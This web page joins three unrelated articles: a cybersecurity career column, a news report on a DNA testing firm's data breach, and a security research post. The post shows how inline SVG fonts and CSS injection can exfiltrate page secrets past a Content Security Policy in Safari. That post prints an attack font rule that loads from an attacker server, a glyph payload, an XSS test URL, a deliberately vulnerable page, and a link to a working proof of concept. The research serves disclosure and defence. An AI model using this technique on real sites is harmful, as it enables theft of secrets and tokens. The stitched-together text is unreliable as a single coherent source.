Finding Your Niche in Cybersecurity

Despite a lack of exposure to issues in computer security during my undergraduate education, I now work as a senior threat researcher tracking advanced persistent threats as they relate to nation-state actors and cybercriminal organizations. I reverse-engineer mobile malware and analyze the infrastructure these threat actors use to both distribute and communicate with malicious applications. (For example, last month my team identified a new rooting malware, AbstractEmu, that was distributed on Google Play and prominent third-party stores, most likely for malicious financial gain.)

I love my job and I love having a hand in stopping the bad guys, but I took the scenic route to get here.

I started programming when I was 9 and began exploring the possibility of studying computer science while I was in high school. I was advised to avoid computer science as it was an impractical, theoretical degree that would never land me a job. As a result, I entered university as an English and political science major and planned to study international law. During my first year, I enrolled in a computer science class as an elective, and our class attended a lecture from a recent graduate who spoke of how useful her degree had been in her role as a video game developer. Inspired, I transferred to the computer science department the following semester.

It wasn’t until five years after I graduated that I found my way to cybersecurity, however. To become a better software engineer, I enrolled in a security certification program and met a wonderful mentor who was working on a security engineering team at the time. He encouraged me to apply for an open position on his team and helped kick-start my career in cybersecurity.

All too often, the best things in life happen serendipitously, like my career in cybersecurity. Despite our interests in high school or even university, most people don’t land their dream job immediately after they graduate; some may not even realize their dream jobs exist! In an informal Instagram poll of approximately 500 participants, 52% responded that they transitioned into cybersecurity either from another area of tech or an entirely unrelated industry.

How Do You Find Your Niche?
One of the biggest challenges with transitioning to a new role in cybersecurity is figuring out the area of security you’re most interested in. Traditionally, roles have been broken down into two main “teams”: red and blue. Red teams typically handle offensive security, “attacking” the corporation with pen testing or social engineering to find vulnerabilities. Blue teams are responsible for defensive security, which includes incident response, digital forensics, and threat intelligence. Recently, new team names have been created to represent overlaps in roles (for example, “purple” teams that handle both offensive and defensive security duties). You can further explore the cybersecurity “colour wheel” and what these roles entail through summaries online, like Hackernoon’s breakdown.

One of the best ways to narrow down the exhaustive list of possibilities of a career in cyber is to explore the finer details of these roles through online job listings. Ask yourself questions such as “Does this look exciting and interesting to me?” or “Can I see myself working on this problem for a prolonged period of time?” or even “Would I enjoy the pressure or expectations set by this role?” 

For example, in some roles, like incident response, you may be required to be “on call” and available to handle issues that arise — day or night — for a set time on a recurring schedule. If you’re someone who struggles in high-pressure environments and can’t see yourself performing well in that situation, then a role with those expectations may not be a great fit. 

I often advise those interested in multiple areas of cybersecurity to participate in a “capture the flag” (CTF) event. These are available online (for example, https://ctftime.org) or in person at security conferences. Participants compete in teams, or individually, to solve challenges that span multiple areas of cybersecurity: network security, pen testing, reverse engineering, and social engineering, among others. This is a great way to gain exposure to other areas of cybersecurity with which you may not be familiar, and most of the challenges are real-world examples of problems you might face in a role within that area of cybersecurity. It was at a CTF event where I discovered my love for reverse engineering!

The cybersecurity industry offers so many opportunities for curious, eager problem solvers. Most importantly, it’s a career path that will only continue to become more valued in the years to come. With a little patience and research, you can find your niche in this exciting industry and discover a role you love that also protects those around you.

First of two parts. The second part of this column will cover diversity in security.

DNA testing firm discloses data breach affecting 2.1 million people

DNA Diagnostics Center (DDC), an Ohio-based DNA testing company, has disclosed a hacking incident that affects 2,102,436 persons.

The incident resulted in a confirmed data breach that occurred between May 24, 2021, and July 28, 2021, and the firm concluded its internal investigation on October 29, 2021.

The information that the hackers accessed includes the following:

  • Full names
  • Credit card number + CVV
  • Debit card number + CVV
  • Financial account number
  • Platform account password

The compromised database contained older backups dating between 2004 and 2012, and it’s not linked to the active systems and databases used by DDC today.

“The impacted database was associated with a national genetic testing organization that DDC has never used in its operations and has not been active since 2012.” reads the notice.

“DDC acquired certain assets from this national genetic testing organization in 2012 that included certain personal information, and therefore, impacts from this incident are not associated with DDC.”

DDC is working with external cyber-security experts to regain possession of the stolen files and ensure that the threat actor won’t propagate them further. So far, there have been no reports of fraud or improper use of the stolen details.

The affected individuals will receive a notification letter and instructions on enrolling for one year of free credit monitoring and identity theft protection services through Experian.

The recipients of these notices are advised to remain vigilant against frauds and monitor their bank account statements frequently to identify and report suspicious activity immediately.

DDC underlines that no genetic testing data has been exposed due to the data breach incident, as this is stored in a different system.

The company offers paternity, DNA relationship, fertility, COVID-19, ancestry, and testing for immigration purposes, so they are holding very sensitive data.

According to the notice though, nothing relevant to these services has been compromised.

We have reached out to DCC to request more details about the nature and impact of the hacking incident, and we will update this piece as soon as we have a response.

Data Exfiltration via CSS + SVG Font

This post will show that the SVG fonts and CSS can be used for reading the page’s text contents.

There are several known ways to read the page’s text contents with CSS. The known techniques are well covered in the following article by Juan Manuel Fernández:

CSS Injection Primitives :: DoomsDay Vault

These techniques can be useful to attackers in some situations, for example, when the input is sanitized and only limitted HTML tags can be used, or JavaScript cannot be used due to the Content Security Policy (CSP) restrictions.

The technique I want to introduce today is one such technique. The basic idea is the same as the following font ligature trick by Michał Bentkowski.

Stealing Data in Great style – How to Use CSS to Attack Web Application. – research.securitum.com

It is the mostly same but I’ve never seen any article mentioning this and I thought it is worth mentioning because the technique I’ll explain here can be useful in the specific situation such as when Michał’s technique cannot be used due to the CSP’s restriction, so I’m writing this.

Well, in my Japanese blog post, around here, I explained Michał’s trick in detail in my words but the person who is reading this can read English, so please read his article first 🙂

Okay, you’ve read it, right? As you learned from his article, he used WOFF fonts convereted from SVG fonts. In my trick, I use SVG fonts without convering it. Michał said “browsers have stopped supporting the SVG format in fonts (hence the need to use the WOFF format)” but in fact, Safari still supports it. After all, the trick I am about to introduce is just a replacement of his trick with SVG fonts. But still, the reason I want to dare to introduce this trick is that SVG fonts can be used even when loading fonts is blocked by the CSP’s restriction. That is, SVG fonts allow reading text contents even on pages where the CSP prohibits loading fonts. This is because SVG fonts can not only be loaded from URLs, like WOFF fonts, but also all font’s components can be defined with in-line without loading from URLs.

Let’s see how Michał’s trick can be replaced.

In his trick, the WOFF font is loaded via <style>’s @font-face.

<style>
@font-face {
    font-family: “hack”;
    src: url(http://192.168.13.37:3001/font/%22/0)
}
[…]
</style>

This style can be replaced with the following inline SVG.

<svg>
<defs>
<font horiz-adv-x=”0″>
<font-face font-family=”hack” units-per-em=”1000″></font-face>
<glyph unicode=”&quot;0″ horiz-adv-x=”99999″ d=”M1 0z”></glyph>
<glyph unicode=”1″ horiz-adv-x=”0″ d=”M1 0z”></glyph>
<glyph unicode=”2″ horiz-adv-x=”0″ d=”M1 0z”></glyph>
<glyph unicode=”3″ horiz-adv-x=”0″ d=”M1 0z”></glyph>
<glyph unicode=”4″ horiz-adv-x=”0″ d=”M1 0z”></glyph>
<glyph unicode=”5″ horiz-adv-x=”0″ d=”M1 0z”></glyph>
[…]
</font>
</defs>
</svg>

Now, if the font-family property is set to “hack” via CSS, the SVG font is applied to the target’s text even outside the SVG. This is not blocked by CSP even if the font-src ‘none’ is set. (Note that to observe the leaked data, this trick uses the background image request as well as Michał’s trick, so at least, the host which can observe the request must be allowed in the img-src directive.)

I’ll show you the PoC. When there is a vulnerable page like the following,

https://vulnerabledoma.in/svg_font/xss.html?xss=%3Cs%3EXSS%3Cscript%3Ealert(1)%3C/script%3E

<!DOCTYPE html>
<html>
<head>
<meta charset=”utf-8″>
<meta http-equiv=”Content-Security-Policy” content=”default-src ‘none’;script-src ‘nonce-random’;style-src ‘unsafe-inline’;img-src https:”>
</head>
<body>
<script id=”leakme” nonce=”random”>
const secret = “573ba8e9bfd0abd3d69d8395db582a9e”;
</script>

<script nonce=”random”>
const params = (new URL(document.location)).searchParams;
const xss = params.get(‘xss’);
if(xss){
    document.write(xss);
}
</script>
</body>
</html>

I’ll show you SVG fonts can leak the “secret” variable.

You can reproduce it by opening the following URL with Safari and clicking the “Go” button. 

PoC: https://l0.cm/svg_font/poc.php

The all code can be found in: https://github.com/masatokinugawa/css-exfiltration-svg-font

If the PoC works correctly, like the following video, multiple new windows will open and after waiting for a while, the secret variable’s string will be displayed little by little, like “573b …” on the page having the “Go” button, like the following video.

It’s almost the same as Michał’s PoC, except that it uses SVG fonts, but there are a few changes. In his PoC, he loads the target page into the iframe but in my PoC, I used window.open() instead. This is because Safari blocks all third party cookies by default now and I thought the attack using the iframe is not so realistic PoC for Safari. Also, I changed the way to pass the data.  Here again, due to the third party cookie blocking, the cookie can not be set when the background image is loaded, so I used the session id with the URL parameter instead. 

By the way, if you’re used to Chrome, you might wonder why multiple new windows are opened by one click. This is because Safari have the popup blocker but there is no limit to the number of windows that can be opened by one click. Thanks to this, it is possible to efficiently try to read the data using multiple windows. 

That’s it. Thanks for reading! I hope this post helps you out.